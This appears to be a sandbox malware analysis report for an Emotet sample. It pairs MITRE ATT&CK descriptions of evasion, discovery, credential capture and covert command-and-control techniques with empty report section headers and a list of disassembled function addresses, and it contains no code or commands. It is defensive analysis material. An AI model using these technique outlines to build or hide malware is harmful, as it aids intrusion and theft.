Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report NWMEaRqF7s.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Emotet

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Function 00404142, Relevance: 45.7, APIs: 21, Strings: 5, Instructions: 229
registrylibraryloaderCOMMON

Function 00401D20, Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 64
libraryloaderCOMMON

Function 02241030, Relevance: 18.4, APIs: 12, Instructions: 362
libraryloaderCOMMON

Function 0040638F, Relevance: 16.6, APIs: 11, Instructions: 139
COMMON

Function 00403F0B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70
libraryCOMMON

Function 022528FB, Relevance: 4.6, APIs: 3, Instructions: 139
fileCOMMON

Function 00401E30, Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 174
windowlibraryloaderCOMMON

Function 0041AB2A, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 122
COMMON

Function 00402750, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75
registrystringCOMMON

Function 0040F1AF, Relevance: 16.6, APIs: 11, Instructions: 103
memoryCOMMONLIBRARYCODE

Function 0040B3B1, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90
COMMON

Function 00401450, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 196
windowCOMMON

Function 0040619F, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158
COMMON

Function 004025F0, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65
registrystringCOMMON

Function 0040EF65, Relevance: 12.0, APIs: 8, Instructions: 38
COMMON

Function 0041ACA9, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40
libraryloaderCOMMON